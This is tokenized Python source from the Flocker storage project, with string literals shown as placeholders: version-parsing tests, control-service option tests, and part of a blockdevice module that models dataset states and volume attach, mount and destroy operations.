b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> weekly_release = b'<STR_LIT:1>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = True , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> PreReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> pre_release = b'<STR_LIT:1>' , <EOL> ) , <EOL> 
doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = True , <EOL> ) , <EOL> ) <EOL> DevelopmentVersionTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> DirtyVersionTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> dirty = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> DocReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> documentation_revision = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = True , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> DocReleaseDirtyTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = 
b'<STR_LIT:2>' , <EOL> documentation_revision = b'<STR_LIT>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> dirty = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> LegacyPreReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> pre_release = b'<STR_LIT>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> is_legacy = True , <EOL> ) , <EOL> ) <EOL> LegacyDocReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> documentation_revision = b'<STR_LIT>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> is_legacy = True , <EOL> ) , <EOL> ) <EOL> class GetPreReleaseTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_not_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( NotAPreRelease , get_pre_release , '<STR_LIT>' ) <EOL> def test_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
assertEqual ( get_pre_release ( '<STR_LIT>' ) , <NUM_LIT:3> ) <EOL> class TargetReleaseTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_not_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( NotAPreRelease , target_release , '<STR_LIT>' ) <EOL> def test_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( target_release ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> class GetPackageKeySuffixTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_marketing_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( get_package_key_suffix ( '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> def test_documentation_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( get_package_key_suffix ( '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> def test_non_marketing_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( get_package_key_suffix ( '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> def test_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( get_package_key_suffix ( '<STR_LIT>' ) , "<STR_LIT>" ) </s>
<s> from twisted . python . filepath import FilePath <EOL> from . . script import ControlOptions , ControlScript <EOL> from ... testtools import ( <EOL> MemoryCoreReactor , make_standard_options_test , TestCase , <EOL> ) <EOL> from . . _clusterstate import ClusterStateService <EOL> from . . httpapi import REST_API_PORT <EOL> from ... ca . testtools import get_credential_sets <EOL> class ControlOptionsTests ( make_standard_options_test ( ControlOptions ) ) : <EOL> """<STR_LIT>""" <EOL> def test_default_port ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ ] ) <EOL> self . assertEqual ( options [ "<STR_LIT:port>" ] , b'<STR_LIT>' % ( REST_API_PORT , ) ) <EOL> def test_custom_port ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ b"<STR_LIT>" , b"<STR_LIT>" ] ) <EOL> self . assertEqual ( options [ "<STR_LIT:port>" ] , b"<STR_LIT>" ) <EOL> def test_default_path ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ ] ) <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , FilePath ( b"<STR_LIT>" ) ) <EOL> def test_path ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ b"<STR_LIT>" , b"<STR_LIT>" ] ) <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , FilePath ( b"<STR_LIT>" ) ) <EOL> def test_default_agent_port ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ ] ) <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , b'<STR_LIT>' ) <EOL> def test_custom_agent_port ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ b"<STR_LIT>" , b"<STR_LIT>" ] ) <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , b"<STR_LIT>" ) <EOL> class ControlScriptTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ControlScriptTests , self ) . 
setUp ( ) <EOL> ca_set , _ = get_credential_sets ( ) <EOL> self . certificate_path = FilePath ( self . mktemp ( ) ) <EOL> self . certificate_path . makedirs ( ) <EOL> ca_set . copy_to ( self . certificate_path , control = True ) <EOL> self . script = ControlScript ( ) <EOL> self . options = ControlOptions ( ) <EOL> self . data_path = FilePath ( self . mktemp ( ) ) <EOL> self . options . parseOptions ( [ <EOL> b"<STR_LIT>" , b"<STR_LIT>" , b"<STR_LIT>" , b"<STR_LIT>" , <EOL> b"<STR_LIT>" , self . data_path . path , <EOL> b"<STR_LIT>" , self . certificate_path . path <EOL> ] ) <EOL> def test_no_immediate_stop ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertNoResult ( <EOL> self . script . main ( MemoryCoreReactor ( ) , self . options ) ) <EOL> def test_starts_persistence_service ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = MemoryCoreReactor ( ) <EOL> self . script . main ( reactor , self . options ) <EOL> self . assertTrue ( self . data_path . isdir ( ) ) <EOL> def test_starts_cluster_state_service ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = MemoryCoreReactor ( ) <EOL> self . script . main ( reactor , self . options ) <EOL> server = reactor . tcpServers [ <NUM_LIT:0> ] <EOL> control_resource = server [ <NUM_LIT:1> ] . wrappedFactory . resource <EOL> service = control_resource . _v1_user . cluster_state_service <EOL> self . assertEqual ( ( service . __class__ , service . running ) , <EOL> ( ClusterStateService , True ) ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> from uuid import UUID <EOL> from stat import S_IRWXU , S_IRWXG , S_IRWXO <EOL> from errno import EEXIST <EOL> from datetime import timedelta <EOL> from eliot import MessageType , ActionType , Field , Logger <EOL> from eliot . serializers import identity <EOL> from zope . interface import implementer , Interface , provider <EOL> from pyrsistent import PClass , field , pmap_field , pset_field , thaw , CheckedPMap <EOL> from characteristic import with_cmp <EOL> from twisted . python . reflect import safe_repr <EOL> from twisted . internet . defer import succeed , fail <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . python . components import proxyForInterface <EOL> from twisted . python . constants import ( <EOL> Values , ValueConstant , <EOL> Names , NamedConstant , <EOL> ) <EOL> from . blockdevice_manager import BlockDeviceManager <EOL> from . _logging import DATASET_ID , COUNT <EOL> from . . import ( <EOL> IDeployer , ILocalState , IStateChange , in_parallel , NoOp , <EOL> ) <EOL> from . . _deploy import NotInUseDatasets <EOL> from ... control import NodeState , Manifestation , Dataset , NonManifestDatasets <EOL> from ... control . _model import pvector_field <EOL> from ... common import RACKSPACE_MINIMUM_VOLUME_SIZE , auto_threaded , provides <EOL> from ... common . 
algebraic import TaggedUnionInvariant <EOL> _logger = Logger ( ) <EOL> DEFAULT_DATASET_SIZE = RACKSPACE_MINIMUM_VOLUME_SIZE <EOL> PROFILE_METADATA_KEY = u"<STR_LIT>" <EOL> class DatasetStates ( Names ) : <EOL> """<STR_LIT>""" <EOL> NON_EXISTENT = NamedConstant ( ) <EOL> UNREGISTERED = NamedConstant ( ) <EOL> REGISTERED = NamedConstant ( ) <EOL> ATTACHED_ELSEWHERE = NamedConstant ( ) <EOL> ATTACHED_TO_DEAD_NODE = NamedConstant ( ) <EOL> NON_MANIFEST = NamedConstant ( ) <EOL> ATTACHED_NO_FILESYSTEM = NamedConstant ( ) <EOL> ATTACHED = NamedConstant ( ) <EOL> MOUNTED = NamedConstant ( ) <EOL> DELETED = NamedConstant ( ) <EOL> class DiscoveredDataset ( PClass ) : <EOL> """<STR_LIT>""" <EOL> state = field ( <EOL> invariant = lambda state : ( state in DatasetStates . iterconstants ( ) , <EOL> "<STR_LIT>" ) , <EOL> mandatory = True , <EOL> ) <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> maximum_size = field ( type = int ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> device_path = field ( FilePath ) <EOL> mount_point = field ( FilePath ) <EOL> __invariant__ = TaggedUnionInvariant ( <EOL> tag_attribute = '<STR_LIT:state>' , <EOL> attributes_for_tag = { <EOL> DatasetStates . ATTACHED_ELSEWHERE : { '<STR_LIT>' } , <EOL> DatasetStates . ATTACHED_TO_DEAD_NODE : { '<STR_LIT>' } , <EOL> DatasetStates . NON_MANIFEST : { '<STR_LIT>' } , <EOL> DatasetStates . UNREGISTERED : { '<STR_LIT>' } , <EOL> DatasetStates . REGISTERED : set ( ) , <EOL> DatasetStates . ATTACHED_NO_FILESYSTEM : { <EOL> '<STR_LIT>' , '<STR_LIT>' } , <EOL> DatasetStates . ATTACHED : { <EOL> '<STR_LIT>' , '<STR_LIT>' } , <EOL> DatasetStates . MOUNTED : { <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' } , <EOL> } , <EOL> ) <EOL> class DesiredDataset ( PClass ) : <EOL> """<STR_LIT>""" <EOL> state = field ( <EOL> invariant = lambda state : ( state in DatasetStates . 
iterconstants ( ) , <EOL> "<STR_LIT>" ) , <EOL> mandatory = True , <EOL> ) <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> maximum_size = field ( type = int ) <EOL> metadata = pmap_field ( <EOL> key_type = unicode , <EOL> value_type = unicode , <EOL> ) <EOL> mount_point = field ( FilePath ) <EOL> filesystem = field ( unicode , initial = u"<STR_LIT>" , mandatory = True , <EOL> invariant = lambda v : ( v == "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> __invariant__ = TaggedUnionInvariant ( <EOL> tag_attribute = '<STR_LIT:state>' , <EOL> attributes_for_tag = { <EOL> DatasetStates . NON_MANIFEST : { "<STR_LIT>" } , <EOL> DatasetStates . MOUNTED : { "<STR_LIT>" , "<STR_LIT>" } , <EOL> DatasetStates . DELETED : set ( ) , <EOL> } , <EOL> ) <EOL> class IDatasetStateChangeFactory ( Interface ) : <EOL> def from_state_and_config ( discovered_dataset , desired_dataset ) : <EOL> """<STR_LIT>""" <EOL> class ICalculator ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def calculate_changes_for_datasets ( <EOL> discovered_datasets , desired_datasets , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> class VolumeException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , blockdevice_id ) : <EOL> if not isinstance ( blockdevice_id , unicode ) : <EOL> raise TypeError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( blockdevice_id ) <EOL> ) <EOL> Exception . __init__ ( self , blockdevice_id ) <EOL> self . blockdevice_id = blockdevice_id <EOL> class UnknownVolume ( VolumeException ) : <EOL> """<STR_LIT>""" <EOL> class AlreadyAttachedVolume ( VolumeException ) : <EOL> """<STR_LIT>""" <EOL> class UnattachedVolume ( VolumeException ) : <EOL> """<STR_LIT>""" <EOL> class DatasetExists ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , blockdevice ) : <EOL> Exception . __init__ ( self , blockdevice ) <EOL> self . 
blockdevice = blockdevice <EOL> class FilesystemExists ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , device ) : <EOL> Exception . __init__ ( self , device ) <EOL> self . device = device <EOL> class UnknownInstanceID ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , blockdevice ) : <EOL> Exception . __init__ ( <EOL> self , <EOL> '<STR_LIT>' . format ( blockdevice ) ) <EOL> self . blockdevice = blockdevice <EOL> DATASET = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda dataset : dataset . dataset_id , <EOL> u"<STR_LIT>" <EOL> ) <EOL> VOLUME = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda volume : volume . blockdevice_id , <EOL> u"<STR_LIT>" <EOL> ) <EOL> FILESYSTEM_TYPE = Field . forTypes ( <EOL> u"<STR_LIT>" , <EOL> [ unicode ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> MOUNTPOINT = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda path : path . path , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" , <EOL> ) <EOL> BLOCK_DEVICE_ID = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda id : unicode ( id ) , <EOL> u"<STR_LIT>" <EOL> ) <EOL> BLOCK_DEVICE_SIZE = Field ( <EOL> u"<STR_LIT>" , <EOL> identity , <EOL> u"<STR_LIT>" <EOL> ) <EOL> BLOCK_DEVICE_COMPUTE_INSTANCE_ID = Field ( <EOL> u"<STR_LIT>" , <EOL> identity , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" , <EOL> ) <EOL> BLOCK_DEVICE_PATH = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda path : path . path , <EOL> u"<STR_LIT>" <EOL> ) <EOL> PROFILE_NAME = Field . forTypes ( <EOL> u"<STR_LIT>" , <EOL> [ unicode ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> MAXIMUM_SIZE = Field . 
forTypes ( <EOL> u"<STR_LIT>" , <EOL> [ int ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> METADATA = Field ( <EOL> u"<STR_LIT>" , <EOL> thaw , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> CREATE_BLOCK_DEVICE_DATASET = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , MAXIMUM_SIZE , METADATA ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> UNMOUNT_BLOCK_DEVICE = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> UNMOUNT_BLOCK_DEVICE_DETAILS = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ BLOCK_DEVICE_ID , BLOCK_DEVICE_PATH ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> MOUNT_BLOCK_DEVICE = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_PATH ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> MOUNT_BLOCK_DEVICE_DETAILS = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ BLOCK_DEVICE_PATH ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> ATTACH_VOLUME = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> DETACH_VOLUME = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> DESTROY_VOLUME = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ BLOCK_DEVICE_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> CREATE_FILESYSTEM = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ BLOCK_DEVICE_PATH , FILESYSTEM_TYPE ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> INVALID_DEVICE_PATH_VALUE = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda value : safe_repr ( value ) , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ) <EOL> INVALID_DEVICE_PATH = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , INVALID_DEVICE_PATH_VALUE ] , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" , <EOL> ) <EOL> CREATE_VOLUME_PROFILE_DROPPED = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , PROFILE_NAME ] , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> ) <EOL> DISCOVERED_RAW_STATE = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ 
Field ( u"<STR_LIT>" , safe_repr ) ] , <EOL> u"<STR_LIT>" ) <EOL> UNREGISTERED_VOLUME_ATTACHED = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_ID ] , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> ) <EOL> FUNCTION_NAME = Field . for_types ( <EOL> "<STR_LIT>" , [ bytes , unicode ] , <EOL> u"<STR_LIT>" ) <EOL> CALL_LIST_VOLUMES = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ FUNCTION_NAME , COUNT ] , <EOL> u"<STR_LIT>" , ) <EOL> REGISTER_BLOCKDEVICE = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> def _volume_field ( ) : <EOL> """<STR_LIT>""" <EOL> return field ( <EOL> type = BlockDeviceVolume , mandatory = True , <EOL> factory = lambda x : x <EOL> ) <EOL> @ with_cmp ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:size>" , "<STR_LIT>" ] ) <EOL> class BlockDeviceVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> size = field ( type = int , mandatory = True ) <EOL> attached_to = field ( <EOL> type = ( unicode , type ( None ) ) , initial = None , mandatory = True <EOL> ) <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> def _blockdevice_volume_from_datasetid ( volumes , dataset_id ) : <EOL> """<STR_LIT>""" <EOL> for volume in volumes : <EOL> if volume . dataset_id == dataset_id : <EOL> return volume <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class CreateFilesystem ( PClass ) : <EOL> """<STR_LIT>""" <EOL> device = field ( type = FilePath , mandatory = True ) <EOL> filesystem = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> device = discovered_dataset . device_path , <EOL> filesystem = desired_dataset . 
filesystem , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return CREATE_FILESYSTEM ( <EOL> _logger , block_device_path = self . device , <EOL> filesystem_type = self . filesystem <EOL> ) <EOL> def run ( self , deployer , state_persister ) : <EOL> try : <EOL> _ensure_no_filesystem ( self . device , deployer . block_device_manager ) <EOL> deployer . block_device_manager . make_filesystem ( self . device , <EOL> self . filesystem ) <EOL> except : <EOL> return fail ( ) <EOL> return succeed ( None ) <EOL> def _ensure_no_filesystem ( device , block_device_manager ) : <EOL> """<STR_LIT>""" <EOL> if block_device_manager . has_filesystem ( device ) : <EOL> raise FilesystemExists ( device ) <EOL> def _valid_size ( size ) : <EOL> """<STR_LIT>""" <EOL> if size % <NUM_LIT> == <NUM_LIT:0> : <EOL> return ( True , "<STR_LIT>" ) <EOL> return ( <EOL> False , "<STR_LIT>" % ( size , ) <EOL> ) <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class MountBlockDevice ( PClass ) : <EOL> """<STR_LIT>""" <EOL> device_path = field ( type = FilePath , mandatory = True ) <EOL> mountpoint = field ( type = FilePath , mandatory = True ) <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = desired_dataset . dataset_id , <EOL> device_path = discovered_dataset . device_path , <EOL> mountpoint = desired_dataset . mount_point , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return MOUNT_BLOCK_DEVICE ( _logger , dataset_id = self . dataset_id , <EOL> block_device_path = self . device_path ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . mountpoint . makedirs ( ) <EOL> except OSError as e : <EOL> if e . errno != EEXIST : <EOL> return fail ( ) <EOL> self . mountpoint . parent ( ) . chmod ( S_IRWXU ) <EOL> deployer . 
block_device_manager . mount ( self . device_path , self . mountpoint ) <EOL> lostfound = self . mountpoint . child ( b"<STR_LIT>" ) <EOL> if self . mountpoint . children ( ) == [ lostfound ] : <EOL> lostfound . remove ( ) <EOL> self . mountpoint . chmod ( S_IRWXU | S_IRWXG | S_IRWXO ) <EOL> self . mountpoint . restat ( ) <EOL> return succeed ( None ) <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class UnmountBlockDevice ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = discovered_dataset . dataset_id , <EOL> blockdevice_id = discovered_dataset . blockdevice_id , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return UNMOUNT_BLOCK_DEVICE ( _logger , dataset_id = self . dataset_id ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . async_block_device_api <EOL> deferred_device_path = api . get_device_path ( self . blockdevice_id ) <EOL> def got_device ( device ) : <EOL> UNMOUNT_BLOCK_DEVICE_DETAILS ( <EOL> block_device_id = self . blockdevice_id , <EOL> block_device_path = device <EOL> ) . write ( _logger ) <EOL> deployer . block_device_manager . unmount ( device ) <EOL> deferred_device_path . addCallback ( got_device ) <EOL> return deferred_device_path <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class AttachVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = discovered_dataset . 
dataset_id , <EOL> blockdevice_id = discovered_dataset . blockdevice_id , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return ATTACH_VOLUME ( _logger , dataset_id = self . dataset_id , <EOL> block_device_id = self . blockdevice_id ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . async_block_device_api <EOL> getting_id = api . compute_instance_id ( ) <EOL> def got_compute_id ( compute_instance_id ) : <EOL> return api . attach_volume ( <EOL> self . blockdevice_id , <EOL> attach_to = compute_instance_id , <EOL> ) <EOL> attaching = getting_id . addCallback ( got_compute_id ) <EOL> return attaching <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class DetachVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = discovered_dataset . dataset_id , <EOL> blockdevice_id = discovered_dataset . blockdevice_id , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return DETACH_VOLUME ( _logger , dataset_id = self . dataset_id , <EOL> block_device_id = self . blockdevice_id ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . async_block_device_api <EOL> return api . detach_volume ( self . blockdevice_id ) <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class DestroyVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( blockdevice_id = discovered_dataset . 
blockdevice_id ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return DESTROY_VOLUME ( _logger , block_device_id = self . blockdevice_id ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . async_block_device_api <EOL> return api . destroy_volume ( self . blockdevice_id ) <EOL> def allocated_size ( allocation_unit , requested_size ) : <EOL> """<STR_LIT>""" <EOL> allocation_unit = int ( allocation_unit ) <EOL> requested_size = int ( requested_size ) <EOL> previous_interval_size = ( <EOL> ( requested_size // allocation_unit ) * allocation_unit <EOL> ) <EOL> if previous_interval_size < requested_size : <EOL> return previous_interval_size + allocation_unit <EOL> else : <EOL> return requested_size <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class CreateBlockDeviceDataset ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( UUID , mandatory = True ) <EOL> maximum_size = field ( int , mandatory = True ) <EOL> metadata = pmap_field ( unicode , unicode ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = desired_dataset . dataset_id , <EOL> maximum_size = desired_dataset . maximum_size , <EOL> metadata = desired_dataset . metadata , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return CREATE_BLOCK_DEVICE_DATASET ( <EOL> _logger , 